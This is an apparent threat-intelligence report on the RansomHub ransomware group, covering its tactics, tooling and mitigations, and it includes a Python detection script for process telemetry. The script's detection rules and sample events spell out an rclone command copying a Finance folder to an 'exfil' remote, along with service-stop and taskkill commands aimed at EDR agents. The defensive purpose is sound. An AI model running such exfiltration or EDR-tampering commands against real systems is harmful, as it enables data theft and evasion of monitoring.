Full Report
As we step into 2025, the high-impact, financially motivated ransomware landscape continues to evolve, shaped by a combination of law enforcement actions, shifting affiliate dynamics, advancements in defensive approaches, and broader economic and geopolitical influences.
Analysis Summary
# Threat Actor: RansomHub
## Attribution & Identity
RansomHub is identified as a prominent, financially motivated ransomware affiliate program that emerged in 2024. It capitalized on the disruption caused by law enforcement actions against groups like LockBit and the exit scam by ALPHV/BlackCat. RansomHub has been linked to claims that some ALPHV affiliates migrated to their platform.
## Activity Summary
RansomHub launched its affiliate program in February 2024 and operated uninterrupted throughout the year. It established itself as one of the most notable affiliate programs, claiming one of the highest numbers of victims in 2024. The group actively uses the RAMP forum for communication and recruitment. Its success is attributed to an affiliate-friendly model, offering a favorable 90-10 split and a direct payment structure.
## Tactics, Techniques & Procedures
- **Initial Access:** Phishing emails, password spraying, and exploitation of public-facing infrastructure.
- **Vulnerability Exploitation:** Targeting known vulnerabilities, including **CVE-2020-1472** (Zerologon) and flaws in enterprise solutions (Citrix, Apache, Confluence, Fortinet).
- **Credential Acquisition:** Gaining access via direct compromises or Initial Access Brokers (IABs), often utilizing Malware-as-a-Service (MaaS) offerings.
- **Entry Points:** Exposed Remote Desktop Services (RDS) and systems lacking Multi-Factor Authentication (MFA).
- **Defense Evasion:** Use of custom-built **"EDR-killer"** malware designed to neutralize Endpoint Detection and Response solutions.
- **Data Movement & Staging:** Use of tools like `netscan` and `rclone`.
- **Ransomware Development:** Uses Golang-based ransomware.
- **Malware/Extortion:** Employs varied extortion tactics, including encryption and data theft, or focuses strictly on data theft and direct blackmail.
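The staging and evasion tooling named in the list above leaves a footprint in process-creation telemetry. The following Python script is an added example, not code from the report or from any vendor: it runs three simple rules over constructed JSON process-creation events (the field names `host`, `image` and `command_line`, the EDR service names and the sample events are all assumptions for the example) and flags `rclone` transfer commands, `netscan` execution, and service-control or process-kill commands aimed at an EDR agent.

```python
import json
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional


@dataclass(frozen=True)
class Alert:
    host: str
    rule: str
    command_line: str


# Placeholder service/process names; a defender fills these in from their own
# EDR deployment. They are NOT product names from the report.
EDR_SERVICE_NAMES = {"edr_agent_svc", "edr_sensor"}

# Service-control and process-kill invocations an EDR-killer or a hands-on-keyboard
# operator would use to silence an agent (sc stop/delete/config, net stop, taskkill /im).
TAMPER_RE = re.compile(
    r"\b(?:sc(?:\.exe)?\s+(?:stop|delete|config)|net(?:\.exe)?\s+stop|taskkill(?:\.exe)?\s+.*?/im)\b",
    re.IGNORECASE,
)

# rclone sub-commands that move data off the host.
RCLONE_TRANSFER_RE = re.compile(r"\b(?:copy|copyto|sync|move)\b", re.IGNORECASE)


def basename(path: str) -> str:
    # Handle both Windows and POSIX separators without depending on the host OS.
    return re.split(r"[\\/]", path)[-1].lower()


def classify(event: dict) -> Optional[str]:
    """Return the name of the first rule an event matches, or None."""
    image = basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    if image in {"rclone", "rclone.exe"} and RCLONE_TRANSFER_RE.search(cmd):
        return "rclone_transfer"
    if image in {"netscan", "netscan.exe"}:
        return "network_scanner"
    if TAMPER_RE.search(cmd):
        lowered = cmd.lower()
        # Only alert when the target is one of our own EDR components; stopping
        # an unrelated service (e.g. the spooler) is noise for this rule.
        if any(name in lowered for name in EDR_SERVICE_NAMES):
            return "edr_tamper"
    return None


def scan_events(lines: Iterable[str]) -> List[Alert]:
    """Parse JSON-lines process-creation events and return matching alerts."""
    alerts: List[Alert] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records instead of aborting the whole batch
        rule = classify(event)
        if rule:
            alerts.append(Alert(event.get("host", "?"), rule, event.get("command_line", "")))
    return alerts


# Constructed sample telemetry (raw strings so the JSON keeps its escaped backslashes).
SAMPLE_EVENTS = [
    r'{"host": "ws-14", "image": "C:\\Tools\\rclone.exe", "command_line": "rclone.exe copy C:\\Finance exfil-remote:share --transfers 8"}',
    r'{"host": "ws-14", "image": "C:\\Users\\Public\\netscan.exe", "command_line": "netscan.exe /range:10.0.0.0/24"}',
    r'{"host": "srv-02", "image": "C:\\Windows\\System32\\sc.exe", "command_line": "sc.exe stop edr_agent_svc"}',
    r'{"host": "srv-02", "image": "C:\\Windows\\System32\\taskkill.exe", "command_line": "taskkill.exe /f /im edr_sensor.exe"}',
    r'{"host": "ws-07", "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe notes.txt"}',
    r'{"host": "srv-02", "image": "C:\\Windows\\System32\\net.exe", "command_line": "net stop spooler"}',
]


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(f"{alert.host:7} {alert.rule:16} {alert.command_line}")
```

On the constructed sample the script raises four alerts (one `rclone_transfer`, one `network_scanner`, two `edr_tamper`) and stays silent on the benign `notepad.exe` and `net stop spooler` events. The rules are deliberately narrow: an EDR-killer that loads a vulnerable driver rather than calling `sc`/`taskkill` would not match the tamper rule, so in practice this belongs beside driver-load and EDR-heartbeat-loss monitoring rather than replacing it.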
## Targeting
- **Sectors:** Not explicitly detailed, but focused on high-impact targets given the nature of RaaS and the high number of victims claimed.
- **Geography:** Not specified in the provided text.
- **Victims:** Claimed one of the highest numbers of victims throughout 2024.
## Tools & Infrastructure
- **Malware Families:** Golang-based ransomware, custom "EDR-killer" malware.
- **Infrastructure:** Utilized the RAMP forum for communication. Specific C2 or IP addresses were not detailed.
## Implications
RansomHub demonstrated significant operational maturity compared to its 2024 peers. Its ability to thrive following major law enforcement actions and competitor collapse signals its readiness to be a dominant force in the RaaS market entering 2025. Its successful business model and adaptability suggest continued high impact on victim organizations.
## Mitigations
- Prioritize **rigorous patch management**, especially for enterprise solutions like Citrix, Apache, and Fortinet, and known critical vulnerabilities like CVE-2020-1472.
- Implement robust **Multi-Factor Authentication (MFA)** on all exposed systems, particularly Remote Desktop Services.
- Deploy **advanced detection and response solutions**, including monitoring for tampering with the EDR agent itself, to counter defense-evasion tooling such as custom EDR-killers.
- Integrate **threat intelligence** to anticipate attacker behaviors specific to this group.